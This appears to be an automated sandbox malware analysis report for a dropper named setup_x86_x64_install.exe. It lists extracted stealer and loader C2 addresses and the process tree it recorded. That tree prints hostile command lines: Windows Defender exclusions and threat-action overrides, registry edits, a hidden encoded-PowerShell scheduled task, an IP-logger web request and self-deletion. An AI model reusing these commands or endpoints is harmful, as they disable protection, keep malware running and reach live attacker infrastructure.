Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
48s -
max time network
633s -
platform
windows10_x64 -
resource
win10-fr -
submitted
20-09-2021 04:42
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
http://shellloader.com/welcome
Extracted
vidar
40.7
706
https://petrenko96.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
199qwe
185.215.113.104:18754
Extracted
icedid
3162718704
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4468 3592 rundll32.exe 17 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6296 3592 rundll32.exe 17 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8804 3592 rundll32.exe 17 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8300 3592 rundll32.exe 17 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral7/memory/5208-328-0x000000000041C5DA-mapping.dmp family_redline behavioral7/memory/5208-326-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral7/memory/5800-457-0x000000000041C5DE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral7/files/0x000400000001ab56-169.dat family_socelars behavioral7/files/0x000400000001ab56-140.dat family_socelars -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral7/memory/2764-262-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar behavioral7/memory/2764-260-0x0000000000980000-0x0000000000A54000-memory.dmp family_vidar -
resource yara_rule behavioral7/files/0x000400000001ab4b-123.dat aspack_v212_v242 behavioral7/files/0x000400000001ab4a-124.dat aspack_v212_v242 behavioral7/files/0x000400000001ab4d-127.dat aspack_v212_v242 behavioral7/files/0x000400000001ab4a-129.dat aspack_v212_v242 behavioral7/files/0x000400000001ab4d-131.dat aspack_v212_v242 behavioral7/files/0x000400000001ab4a-128.dat aspack_v212_v242 behavioral7/files/0x000400000001ab4b-125.dat aspack_v212_v242 -
Blocklisted process makes network request 1 IoCs
flow pid Process 15 584 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 15 IoCs
pid Process 912 setup_installer.exe 1144 setup_install.exe 2652 Sun1917b8fb5f09db8.exe 1792 Sun193fda712d9f1.exe 584 powershell.exe 3988 Sun19e4ade31b2a.exe 3184 Sun1908b94df837b3158.exe 2764 Sun19eb40faaaa9.exe 4168 Sun191101c1aaa.exe 4152 Sun195a1614ec24e6a.exe 4160 Sun19de8ff4b6aefeb8.exe 4188 f.exe 4204 Sun198361825f4.exe 4312 Sun1966fb31dd5a07.exe 4472 schtasks.exe -
Loads dropped DLL 7 IoCs
pid Process 1144 setup_install.exe 1144 setup_install.exe 1144 setup_install.exe 1144 setup_install.exe 1144 setup_install.exe 1144 setup_install.exe 4472 schtasks.exe -
resource yara_rule behavioral7/files/0x000400000001ab77-270.dat themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 254 ip-api.com 376 ipinfo.io 377 ipinfo.io 10 ip-api.com 78 ipinfo.io 82 ipinfo.io 252 ipinfo.io 253 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 19 IoCs
pid pid_target Process procid_target 5888 5116 WerFault.exe 108 3640 4160 WerFault.exe 93 4716 4248 WerFault.exe 5552 4352 WerFault.exe 2628 4248 WerFault.exe 5380 4160 WerFault.exe 93 5916 4248 WerFault.exe 3808 4160 WerFault.exe 93 6024 4248 WerFault.exe 4488 4160 WerFault.exe 93 4240 4248 WerFault.exe 5092 4248 WerFault.exe 4412 4160 WerFault.exe 93 5708 2764 WerFault.exe 87 6220 4160 WerFault.exe 93 6676 4160 WerFault.exe 93 7032 4160 WerFault.exe 93 4548 4160 WerFault.exe 93 5524 4160 WerFault.exe 93 -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 10128 schtasks.exe 4420 schtasks.exe 4124 schtasks.exe 4472 schtasks.exe 7928 schtasks.exe 8412 schtasks.exe 228 schtasks.exe 9672 schtasks.exe 9748 schtasks.exe 7556 schtasks.exe 5216 schtasks.exe 6240 schtasks.exe 7960 schtasks.exe 9904 schtasks.exe 9404 schtasks.exe 6196 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 8468 timeout.exe 5592 timeout.exe 7336 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 6392 taskkill.exe 7056 taskkill.exe 5456 taskkill.exe 9176 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3828 powershell.exe 3828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeCreateTokenPrivilege 584 powershell.exe Token: SeAssignPrimaryTokenPrivilege 584 powershell.exe Token: SeLockMemoryPrivilege 584 powershell.exe Token: SeIncreaseQuotaPrivilege 584 powershell.exe Token: SeMachineAccountPrivilege 584 powershell.exe Token: SeTcbPrivilege 584 powershell.exe Token: SeSecurityPrivilege 584 powershell.exe Token: SeTakeOwnershipPrivilege 584 powershell.exe Token: SeLoadDriverPrivilege 584 powershell.exe Token: SeSystemProfilePrivilege 584 powershell.exe Token: SeSystemtimePrivilege 584 powershell.exe Token: SeProfSingleProcessPrivilege 584 powershell.exe Token: SeIncBasePriorityPrivilege 584 powershell.exe Token: SeCreatePagefilePrivilege 584 powershell.exe Token: SeCreatePermanentPrivilege 584 powershell.exe Token: SeBackupPrivilege 584 powershell.exe Token: SeRestorePrivilege 584 powershell.exe Token: SeShutdownPrivilege 584 powershell.exe Token: SeDebugPrivilege 584 powershell.exe Token: SeAuditPrivilege 584 powershell.exe Token: SeSystemEnvironmentPrivilege 584 powershell.exe Token: SeChangeNotifyPrivilege 584 powershell.exe Token: SeRemoteShutdownPrivilege 584 powershell.exe Token: SeUndockPrivilege 584 powershell.exe Token: SeSyncAgentPrivilege 584 powershell.exe Token: SeEnableDelegationPrivilege 584 powershell.exe Token: SeManageVolumePrivilege 584 powershell.exe Token: SeImpersonatePrivilege 584 powershell.exe Token: SeCreateGlobalPrivilege 584 powershell.exe Token: 31 584 powershell.exe Token: 32 584 powershell.exe Token: 33 584 powershell.exe Token: 34 584 powershell.exe Token: 35 584 powershell.exe Token: SeDebugPrivilege 4168 Sun191101c1aaa.exe Token: SeDebugPrivilege 3988 Sun19e4ade31b2a.exe Token: SeDebugPrivilege 3828 powershell.exe Token: SeDebugPrivilege 4152 Sun195a1614ec24e6a.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 504 wrote to memory of 912 504 setup_x86_x64_install.exe 75 PID 504 wrote to memory of 912 504 setup_x86_x64_install.exe 75 PID 504 wrote to memory of 912 504 setup_x86_x64_install.exe 75 PID 912 wrote to memory of 1144 912 Process not Found 76 PID 912 wrote to memory of 1144 912 Process not Found 76 PID 912 wrote to memory of 1144 912 Process not Found 76 PID 1144 wrote to memory of 2204 1144 setup_install.exe 79 PID 1144 wrote to memory of 2204 1144 setup_install.exe 79 PID 1144 wrote to memory of 2204 1144 setup_install.exe 79 PID 1144 wrote to memory of 2400 1144 setup_install.exe 80 PID 1144 wrote to memory of 2400 1144 setup_install.exe 80 PID 1144 wrote to memory of 2400 1144 setup_install.exe 80 PID 1144 wrote to memory of 3032 1144 setup_install.exe 81 PID 1144 wrote to memory of 3032 1144 setup_install.exe 81 PID 1144 wrote to memory of 3032 1144 setup_install.exe 81 PID 1144 wrote to memory of 2604 1144 setup_install.exe 178 PID 1144 wrote to memory of 2604 1144 setup_install.exe 178 PID 1144 wrote to memory of 2604 1144 setup_install.exe 178 PID 2400 wrote to memory of 2652 2400 cmd.exe 179 PID 2400 wrote to memory of 2652 2400 cmd.exe 179 PID 2400 wrote to memory of 2652 2400 cmd.exe 179 PID 1144 wrote to memory of 2892 1144 setup_install.exe 82 PID 1144 wrote to memory of 2892 1144 setup_install.exe 82 PID 1144 wrote to memory of 2892 1144 setup_install.exe 82 PID 1144 wrote to memory of 3484 1144 setup_install.exe 83 PID 1144 wrote to memory of 3484 1144 setup_install.exe 83 PID 1144 wrote to memory of 3484 1144 setup_install.exe 83 PID 1144 wrote to memory of 4072 1144 setup_install.exe 177 PID 1144 wrote to memory of 4072 1144 setup_install.exe 177 PID 1144 wrote to memory of 4072 1144 setup_install.exe 177 PID 1144 wrote to memory of 3748 1144 setup_install.exe 176 PID 1144 wrote to memory of 3748 1144 setup_install.exe 176 PID 1144 wrote to memory of 3748 1144 setup_install.exe 176 PID 1144 wrote to memory of 1796 1144 setup_install.exe 106 PID 1144 wrote to memory of 1796 1144 setup_install.exe 106 PID 1144 wrote to memory of 1796 1144 setup_install.exe 106 PID 2604 wrote to memory of 1792 2604 cmd.exe 104 PID 2604 wrote to memory of 1792 2604 cmd.exe 104 PID 1144 wrote to memory of 512 1144 setup_install.exe 84 PID 1144 wrote to memory of 512 1144 setup_install.exe 84 PID 1144 wrote to memory of 512 1144 setup_install.exe 84 PID 2204 wrote to memory of 3828 2204 cmd.exe 100 PID 2204 wrote to memory of 3828 2204 cmd.exe 100 PID 2204 wrote to memory of 3828 2204 cmd.exe 100 PID 1144 wrote to memory of 3908 1144 setup_install.exe 270 PID 1144 wrote to memory of 3908 1144 setup_install.exe 270 PID 1144 wrote to memory of 3908 1144 setup_install.exe 270 PID 3032 wrote to memory of 584 3032 cmd.exe 97 PID 3032 wrote to memory of 584 3032 cmd.exe 97 PID 3032 wrote to memory of 584 3032 cmd.exe 97 PID 1144 wrote to memory of 908 1144 setup_install.exe 96 PID 1144 wrote to memory of 908 1144 setup_install.exe 96 PID 1144 wrote to memory of 908 1144 setup_install.exe 96 PID 1144 wrote to memory of 684 1144 setup_install.exe 85 PID 1144 wrote to memory of 684 1144 setup_install.exe 85 PID 1144 wrote to memory of 684 1144 setup_install.exe 85 PID 2892 wrote to memory of 3988 2892 cmd.exe 95 PID 2892 wrote to memory of 3988 2892 cmd.exe 95 PID 3484 wrote to memory of 3184 3484 cmd.exe 86 PID 3484 wrote to memory of 3184 3484 cmd.exe 86 PID 3484 wrote to memory of 3184 3484 cmd.exe 86 PID 1796 wrote to memory of 2764 1796 cmd.exe 87 PID 1796 wrote to memory of 2764 1796 cmd.exe 87 PID 1796 wrote to memory of 2764 1796 cmd.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
PID:912 -
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
PID:2652 -
C:\Users\Admin\Documents\GT0Pa0vhlC5RboqnX30EW6Gp.exe"C:\Users\Admin\Documents\GT0Pa0vhlC5RboqnX30EW6Gp.exe"6⤵PID:6728
-
-
C:\Users\Admin\Documents\NAdHIcKSgkYS2BiJus1YCCNH.exe"C:\Users\Admin\Documents\NAdHIcKSgkYS2BiJus1YCCNH.exe"6⤵PID:6228
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵PID:6572
-
C:\Users\Admin\AppData\Local\Temp\f.exe"f.exe"8⤵
- Executes dropped EXE
PID:4188 -
C:\Users\Admin\AppData\Local\237843444.exe"C:\Users\Admin\AppData\Local\237843444.exe"9⤵PID:7488
-
-
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"8⤵PID:816
-
-
C:\Users\Admin\AppData\Local\Temp\wwl.exe"wwl.exe"8⤵PID:6000
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵PID:5356
-
-
-
-
C:\Users\Admin\Documents\Oxv1ees2Gkntm9ty9Ec3BxV8.exe"C:\Users\Admin\Documents\Oxv1ees2Gkntm9ty9Ec3BxV8.exe"6⤵PID:6408
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵PID:6472
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵PID:6360
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵PID:6616
-
-
-
C:\Users\Admin\Documents\dlIdQFrFqaRbVimziU9DEXV0.exe"C:\Users\Admin\Documents\dlIdQFrFqaRbVimziU9DEXV0.exe"6⤵PID:5856
-
-
C:\Users\Admin\Documents\XO8zOKcKprOKJaS_SVAVQF2U.exe"C:\Users\Admin\Documents\XO8zOKcKprOKJaS_SVAVQF2U.exe"6⤵PID:6040
-
C:\Users\Admin\Documents\XO8zOKcKprOKJaS_SVAVQF2U.exeC:\Users\Admin\Documents\XO8zOKcKprOKJaS_SVAVQF2U.exe7⤵PID:4584
-
-
C:\Users\Admin\Documents\XO8zOKcKprOKJaS_SVAVQF2U.exeC:\Users\Admin\Documents\XO8zOKcKprOKJaS_SVAVQF2U.exe7⤵PID:3492
-
-
-
C:\Users\Admin\Documents\ZSwINuVierE7iBalURSc5Yqp.exe"C:\Users\Admin\Documents\ZSwINuVierE7iBalURSc5Yqp.exe"6⤵PID:2104
-
-
C:\Users\Admin\Documents\6bzTifqHW5jfK09MWW0YvVY7.exe"C:\Users\Admin\Documents\6bzTifqHW5jfK09MWW0YvVY7.exe"6⤵PID:6492
-
-
C:\Users\Admin\Documents\QAs94Scwv71RCgsdPmWFqLx_.exe"C:\Users\Admin\Documents\QAs94Scwv71RCgsdPmWFqLx_.exe"6⤵PID:5360
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\QAs94Scwv71RCgsdPmWFqLx_.exe"7⤵PID:3908
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:5592
-
-
-
-
C:\Users\Admin\Documents\oGco5T5rtxxdDl0LdT9Yi3om.exe"C:\Users\Admin\Documents\oGco5T5rtxxdDl0LdT9Yi3om.exe"6⤵PID:6884
-
-
C:\Users\Admin\Documents\YAJ4s0C3ILIszOQ4iPK5DPYu.exe"C:\Users\Admin\Documents\YAJ4s0C3ILIszOQ4iPK5DPYu.exe"6⤵PID:6468
-
C:\Users\Admin\Documents\YAJ4s0C3ILIszOQ4iPK5DPYu.exeC:\Users\Admin\Documents\YAJ4s0C3ILIszOQ4iPK5DPYu.exe7⤵PID:5936
-
-
C:\Users\Admin\Documents\YAJ4s0C3ILIszOQ4iPK5DPYu.exeC:\Users\Admin\Documents\YAJ4s0C3ILIszOQ4iPK5DPYu.exe7⤵PID:5560
-
-
-
C:\Users\Admin\Documents\s1Ozpl4ZXS31OxhS0GjAo0P9.exe"C:\Users\Admin\Documents\s1Ozpl4ZXS31OxhS0GjAo0P9.exe"6⤵PID:4892
-
-
C:\Users\Admin\Documents\dB2FM4QqYxqmTBdFWzw7aq28.exe"C:\Users\Admin\Documents\dB2FM4QqYxqmTBdFWzw7aq28.exe"6⤵PID:6380
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dB2FM4QqYxqmTBdFWzw7aq28.exe" /f & erase "C:\Users\Admin\Documents\dB2FM4QqYxqmTBdFWzw7aq28.exe" & exit7⤵PID:7364
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dB2FM4QqYxqmTBdFWzw7aq28.exe" /f8⤵
- Kills process with taskkill
PID:7056
-
-
-
-
C:\Users\Admin\Documents\Dl1Av9OHZkVRE4wHNvdMEMB_.exe"C:\Users\Admin\Documents\Dl1Av9OHZkVRE4wHNvdMEMB_.exe"6⤵PID:5544
-
C:\Users\Admin\Documents\Dl1Av9OHZkVRE4wHNvdMEMB_.exe"C:\Users\Admin\Documents\Dl1Av9OHZkVRE4wHNvdMEMB_.exe"7⤵PID:4852
-
-
-
C:\Users\Admin\Documents\kQ8SuI0jykE7x5f_VMf40PWT.exe"C:\Users\Admin\Documents\kQ8SuI0jykE7x5f_VMf40PWT.exe"6⤵PID:6356
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im kQ8SuI0jykE7x5f_VMf40PWT.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\kQ8SuI0jykE7x5f_VMf40PWT.exe" & del C:\ProgramData\*.dll & exit7⤵PID:8052
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im kQ8SuI0jykE7x5f_VMf40PWT.exe /f8⤵
- Kills process with taskkill
PID:5456
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:7336
-
-
-
-
C:\Users\Admin\Documents\yOgwDAswXc_lN4P47KQnsQpK.exe"C:\Users\Admin\Documents\yOgwDAswXc_lN4P47KQnsQpK.exe"6⤵PID:6332
-
-
C:\Users\Admin\Documents\KJmkCY43PnK0yg72rjrojJu6.exe"C:\Users\Admin\Documents\KJmkCY43PnK0yg72rjrojJu6.exe"6⤵PID:2172
-
-
C:\Users\Admin\Documents\DmWm3KBRXjk36P432DvB_GjC.exe"C:\Users\Admin\Documents\DmWm3KBRXjk36P432DvB_GjC.exe"6⤵PID:5416
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵PID:7620
-
C:\Users\Admin\Documents\k7nsiQ78jAyfI_GJJGW8jCEc.exe"C:\Users\Admin\Documents\k7nsiQ78jAyfI_GJJGW8jCEc.exe"8⤵PID:8968
-
-
C:\Users\Admin\Documents\XDMiK93Ik6hTNmb7gAEJVk9x.exe"C:\Users\Admin\Documents\XDMiK93Ik6hTNmb7gAEJVk9x.exe" /mixtwo8⤵PID:5224
-
-
C:\Users\Admin\Documents\9BlNLDWpP8aWLHEHafb0jbIO.exe"C:\Users\Admin\Documents\9BlNLDWpP8aWLHEHafb0jbIO.exe"8⤵PID:7300
-
C:\Users\Admin\AppData\Local\Temp\7zSB916.tmp\Install.exe.\Install.exe9⤵PID:7812
-
C:\Users\Admin\AppData\Local\Temp\7zSC069.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵PID:6932
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵PID:7496
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:8404
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:7876
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:584 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:8000
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵PID:9256
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:9644
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:6904
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵PID:4380
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵PID:7492
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵PID:9140
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵PID:6396
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵PID:8916
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵PID:5880
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵PID:8540
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵PID:8732
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxiSwVdVE" /SC once /ST 02:24:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
PID:5216
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxiSwVdVE"11⤵PID:4576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxiSwVdVE"11⤵PID:5080
-
-
